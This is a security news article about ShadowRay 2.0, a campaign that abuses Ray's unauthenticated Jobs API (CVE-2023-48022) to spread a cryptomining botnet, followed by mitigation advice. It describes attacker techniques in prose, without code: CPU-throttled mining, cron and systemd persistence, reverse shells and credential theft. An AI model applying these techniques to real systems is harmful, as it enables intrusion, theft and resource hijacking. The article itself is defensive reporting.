A global campaign named ShadowRay 2.0 is exploiting an unpatched, critical code execution flaw in publicly exposed Ray Clusters to convert them into a self propagating cryptomining botnet. Ray is an open source framework developed by Anyscale for building and scaling AI and Python applications.
Exploiting an Unfixed Vulnerability
The threat actor, tracked as IronErn440, is compromising vulnerable Ray infrastructure that is directly accessible over the public internet. This campaign is a continuation of the previous ShadowRay attacks, both of which exploit an old, unpatched vulnerability, CVE-2023-48022.
The Ray framework was designed to operate within a trusted, strictly controlled network environment, so the security flaw never received a patch. However, researchers noted a huge spike in exposure, with now over 230,000 Ray servers publicly available on the internet.
Oligo researchers observed two recent attack waves, one using GitLab for payload delivery and a current one active since November 17, which abuses GitHub.
AI Generated Payloads and Multifunctionality
The attackers are leveraging the unauthenticated Jobs API in Ray via CVE-2023-48022 to run complex, multi stage Bash and Python payloads. These payloads are assessed to be AI generated, based on the analysis of their structure, comments, and error handling patterns, which include "docstrings and useless echoes."
The malware then uses Ray's orchestration capabilities to autonomously spread the infection across all nodes in the cluster. While the primary goal is cryptocurrency mining, the activity also includes data and credential theft, and the deployment of Distributed Denial of Service (DDoS) attacks.
The crypto mining module, which is also AI generated, uses XMRig to mine for Monero. It intentionally limits CPU usage to 60% to evade immediate detection, and achieves persistence via cron jobs and systemd modifications. The attacker also ensures exclusivity by terminating rival mining scripts and blocking other mining pools through /etc/hosts and iptables. Beyond mining, the malware opens multiple Python reverse shells for interactive control, allowing access to and potential exfiltration of sensitive data, including proprietary AI models, source code, and MySQL credentials.
Mitigation
Since there is no direct patch for CVE-2023-48022, Ray users must follow vendor recommended best practices for deployment. These measures include:
- Deploying Ray exclusively in a secure, trusted environment.
- Protecting clusters from unauthorized access using strict firewall rules and security group policies.
- Adding authorization on top of the Ray Dashboard port (default 8265).
- Implementing continuous monitoring on AI clusters to identify anomalous activity.
Found this article interesting? Follow us on X(Twitter) ,Threads and FaceBook to read more exclusive content we post.
